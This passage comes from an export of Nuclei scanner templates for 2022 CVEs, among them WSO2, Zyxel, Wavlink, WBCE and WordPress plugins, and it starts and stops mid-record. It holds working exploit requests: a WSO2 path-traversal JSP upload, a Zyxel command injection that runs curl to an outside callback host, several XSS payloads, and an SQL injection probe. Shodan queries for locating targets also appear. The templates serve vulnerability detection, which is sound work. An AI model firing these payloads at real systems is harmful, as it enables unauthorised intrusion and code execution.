CWE-79\n epss-score: 0.0019\n epss-percentile: 0.56534\n cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: elementor\n product: website_builder\n framework: wordpress\n tags: cve,cve2022,xss,wordpress,elementor\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/elementor/readme.txt'\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '<= 3.5.5')\n\n - type: word\n part: body\n words:\n - 'Elementor Website Builder'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n internal: true\n\n - type: regex\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n# digest: 4a0a004730450220132dd18822d4be6e55b83dc3418190c6b99196da5fe45f1cb6830726664d2f5a022100b9c8cb73aa892d6d0e8a18f869dc632c2795411bb3c62c508306024a87fb2fb9:922c64590222798bb761d5b6d8e72950", "hash": "60950433a0c72a931c505095f2384b36", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308513" }, "name": "CVE-2022-29464.yaml", "content": "id: CVE-2022-29464\n\ninfo:\n name: WSO2 Management - Arbitrary File Upload & Remote Code Execution\n author: luci,dhiyaneshDk\n severity: critical\n description: |\n Certain WSO2 products allow unrestricted file upload with resultant remote code execution. 
This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability.\n reference:\n - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738\n - https://github.com/hakivvi/CVE-2022-29464\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29464\n - http://www.openwall.com/lists/oss-security/2022/04/22/7\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29464\n cwe-id: CWE-22\n epss-score: 0.97146\n epss-percentile: 0.99783\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: wso2\n product: api_manager\n shodan-query: http.favicon.hash:1398055326\n tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev\n\nhttp:\n - raw:\n - |\n POST /fileupload/toolsAny HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n Content-Length: 348\n\n -----------------------------250033711231076532771336998311\n Content-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\n Content-Type: application/octet-stream\n\n <% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n -----------------------------250033711231076532771336998311--\n - |\n GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(body_2, 'WSO2-RCE-CVE-2022-29464')\"\n# digest: 4a0a0047304502206626d39352045dab0703dbd61d9cecafd6e7f18e8d9316bef52d936ca126b399022100d448de4461fe4835998a05ef187668142f89f7025b11abe66e0e3305508c1171:922c64590222798bb761d5b6d8e72950", "hash": "7d919754eff31c7de9066f19b893908d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308514" }, "name": "CVE-2022-29548.yaml", "content": "id: CVE-2022-29548\n\ninfo:\n name: WSO2 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29548\n - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html\n - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/\n - https://github.com/vishnusomank/GoXploitDB\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29548\n cwe-id: CWE-79\n 
epss-score: 0.00299\n epss-percentile: 0.68867\n cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wso2\n product: api_manager\n google-query: inurl:\"carbon/admin/login\"\n tags: cve,cve2022,wso2,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"CARBON.showWarningDialog('???');alert(document.domain)//???\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950", "hash": "e20646d6875b0fa1ea983a9b5ea74b2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308515" }, "name": "CVE-2022-29775.yaml", "content": "id: CVE-2022-29775\n\ninfo:\n name: iSpy 7.2.2.0 - Authentication Bypass\n author: arafatansari\n severity: critical\n description: |\n iSpy 7.2.2.0 contains an authentication bypass vulnerability. 
An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.\n reference:\n - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b\n - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29775\n - https://github.com/securylight/CVES_write_ups\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29775\n cwe-id: CWE-287\n epss-score: 0.01088\n epss-percentile: 0.82745\n cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ispyconnect\n product: ispy\n shodan-query: http.html:\"iSpy is running\"\n tags: cve,cve2022,ispy,auth-bypass,ispyconnect\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/logfile?d=crossdomain.xml'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Log Start'\n - 'Log File'\n - 'iSpy'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202266b24b3ca73622ae1a9a90ed2ca8a2800fd51395203f79212cca3efcca657c022072817838ecc6d8bcfbefc1ed8b599b073956b1ea37fbd0821541a08b1e56798d:922c64590222798bb761d5b6d8e72950", "hash": "c94e98b3f61865ed6a1a1a965258ca8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308516" }, "name": "CVE-2022-30073.yaml", "content": "id: CVE-2022-30073\n\ninfo:\n name: WBCE CMS 1.5.2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WBCE CMS 
1.5.2 contains a stored cross-site scripting vulnerability via \\admin\\user\\save.php Display Name parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/APTX-4879/CVE\n - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30073\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-30073\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.57793\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wbce\n product: wbce_cms\n tags: cve2022,cve,wbcecms,xss,wbce\n\nhttp:\n - raw:\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    \"\n - \"WBCECMS\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: formtoken\n group: 1\n regex:\n - ''\n internal: true\n part: body\n# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950", "hash": "321dba3ea2302471383fb04b3cfeacce", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308517" }, "name": "CVE-2022-30489.yaml", "content": "id: CVE-2022-30489\n\ninfo:\n name: Wavlink WN-535G3 - Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/badboycxcc/XSS-CVE-2022-30489\n - https://github.com/badboycxcc/XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30489\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30489\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36947\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,xss,wavlink,router,iot\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'parent.location.replace(\"http://\")'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950", "hash": "4b6d48932ef28755d022b2ff60b33e8c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308518" }, "name": "CVE-2022-30512.yaml", "content": "id: CVE-2022-30512\n\ninfo:\n name: School Dormitory Management System 1.0 - SQL Injection\n author: tess\n severity: critical\n description: |\n School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30512\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30512\n - https://github.com/SYRTI/POC_to_review\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-30512\n cwe-id: CWE-89\n epss-score: 0.02624\n epss-percentile: 0.89288\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve,cve2022,sqli,school_dormitory_management_system_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Fatal error'\n - 'Uncaught Error: Call to a member function fetch_assoc()'\n - 'Month of'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950", "hash": "18b430a42406b93e5abbc6a692b94424", "level": 6, "time": 
"2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308519" }, "name": "CVE-2022-30513.yaml", "content": "id: CVE-2022-30513\n\ninfo:\n name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30513\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30513\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30513\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project\n\nhttp:\n - raw:\n - |\n POST /dms/admin/login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n\n username={{username}}&password={{password}}\n - |\n GET 
/dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"''; alert(document.domain); s='';\"\n - \"School Dormitory Management System\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950", "hash": "f6ef5e61e456b43e8d17d5cfd08c4185", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851a" }, "name": "CVE-2022-30514.yaml", "content": "id: CVE-2022-30514\n\ninfo:\n name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30514\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30514\n - https://github.com/Marcuccio/kevin\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30514\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project\n\nhttp:\n - raw:\n - |\n POST /dms/admin/login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n\n username={{username}}&password={{password}}\n - |\n GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"''; alert(document.domain); s='';\"\n - \"School Dormitory Management System\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1cbf9f22134eb78b7d8269338039056f10e9a1d459561bfeb4a4273ceb08d4302203b2f1ddc9b80bac96a44fba68d9c28c248e12ef89a720e1ce2a1921fc0fb9a63:922c64590222798bb761d5b6d8e72950", "hash": 
"141d1cd713a2d85b08a9d3abe930808b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851b" }, "name": "CVE-2022-30525.yaml", "content": "id: CVE-2022-30525\n\ninfo:\n name: Zyxel Firewall - OS Command Injection\n author: h1ei1,prajiteshsingh\n severity: critical\n description: |\n An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.\n reference:\n - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/\n - https://github.com/rapid7/metasploit-framework/pull/16563\n - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30525\n - http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-30525\n cwe-id: CWE-78\n epss-score: 0.97482\n epss-percentile: 0.99967\n cpe: 
cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: usg_flex_100w_firmware\n shodan-query: title:\"USG FLEX 100\",\"USG FLEX 100w\",\"USG FLEX 200\",\"USG FLEX 500\",\"USG FLEX 700\",\"USG FLEX 50\",\"USG FLEX 50w\",\"ATP100\",\"ATP200\",\"ATP500\",\"ATP700\"\n tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce\n\nhttp:\n - raw:\n - |\n POST /ztp/cgi-bin/handler HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950", "hash": "b2766dd764857d8847a1c634e349ee6a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851c" }, "name": "CVE-2022-3062.yaml", "content": "id: CVE-2022-3062\n\ninfo:\n name: Simple File List < 4.4.12 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 4.4.12\n reference:\n - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3062\n - https://wordpress.org/plugins/simple-file-list/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3062\n cwe-id: CWE-79\n epss-score: 0.0012\n epss-percentile: 0.46075\n cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: simplefilelist\n product: simple-file-list\n framework: wordpress\n tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"ee-simple-file-list\")'\n - 'contains(body_2, \"onanimationstart=alert(document.domain)//\")'\n condition: and\n# digest: 4a0a004730450221009b8058e2d09fded7acc96d56479398cd66ad473245c9a0aedcd58109aade3dc502204b7c40619880f5fc9c9742dedc31da8c5ec37f59fe121a562c11d2884098bb5b:922c64590222798bb761d5b6d8e72950", "hash": "37cf49ce1c064355e6646cf5ce2ead27", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851d" }, "name": "CVE-2022-30776.yaml", "content": "id: CVE-2022-30776\n\ninfo:\n name: Atmail 6.5.0 - Cross-Site Scripting\n author: 3th1c_yuk1\n severity: medium\n description: |\n Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Atmail that 
addresses this vulnerability.\n reference:\n - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9\n - https://www.atmail.com/\n - https://help.atmail.com/hc/en-us/sections/115003283988\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30776\n - https://medium.com/%40bhattronit96/cve-2022-30776-cd34f977c2b9\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30776\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43631\n cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: atmail\n product: atmail\n shodan-query: http.html:\"atmail\"\n tags: cve2022,cve,atmail,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Error: 1\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950", "hash": "7024c6a73b3c17317be9b40713c9b3f1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851e" }, "name": "CVE-2022-30777.yaml", "content": "id: CVE-2022-30777\n\ninfo:\n name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting\n author: 3th1c_yuk1\n severity: medium\n description: |\n Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to 
mitigate the XSS vulnerability.\n reference:\n - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59\n - https://en.wikipedia.org/wiki/H-Sphere\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30777\n - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30777\n cwe-id: CWE-79\n epss-score: 0.00087\n epss-percentile: 0.36061\n cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: parallels\n product: h-sphere\n shodan-query: title:\"h-sphere\"\n tags: cve,cve2022,parallels,hsphere,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"><script>alert(document.domain)</script>'\n\n - type: word\n part: header\n words:\n - 